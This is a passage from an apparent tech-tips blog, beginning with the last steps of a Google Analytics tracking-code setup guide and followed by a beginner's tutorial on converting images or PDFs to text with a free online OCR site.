9. Once again open Google anaytics window (tab) and refresh it.
10. You will see that your Tracking code Installed successfully.

Read More

How To Convert an Image To Text Format Online


Today I'm going to explain you, how to covert an image into text or word format using online application. Sometimes, you might have written long script in a paper and you would like to copy those words into your computer (eg: MS office,StarOffice etc..,) without typing.

Or you had journals,books, news paper, want to type those words in the newspaper and send to your friend's email. It not possible to look and type those words in your compose mail. 

So this tutorial cover a best way to turn image into text or word format through online. There are many online OCR (Optical Character Recognition) website are available for free use and simple which will extract text from image. Here I'm sharing only a best site called Free OCR.

It support almost every types of image file such as JPG, GIF, TIFF BMP and PDF too. It takes 2-3 minutes process to extract text from image. There is an limitation that is to upload only image size lover than 2MB. You can extract any language from the image. Lets go through steps to convert image or pdf to text format.

How To Convert a Image To Text Format Online:

  1. Go to Free OCR site.

  2. 1.Upload image file which want to convert and should be lower than 2MB.
    2.Select a preferred language and type security captcha (to prove that you are human).
    3.At last click Send file button to convert image to text.
    4.Now you will get extracted text from the image. Just copy and use wherever you want.
    5.Using this OCR site, you can easily convert any image to text format. I hope you like my Tutorial. Comment if you got any error while converting
.
Read More
copyrightedPCTT ---sitemap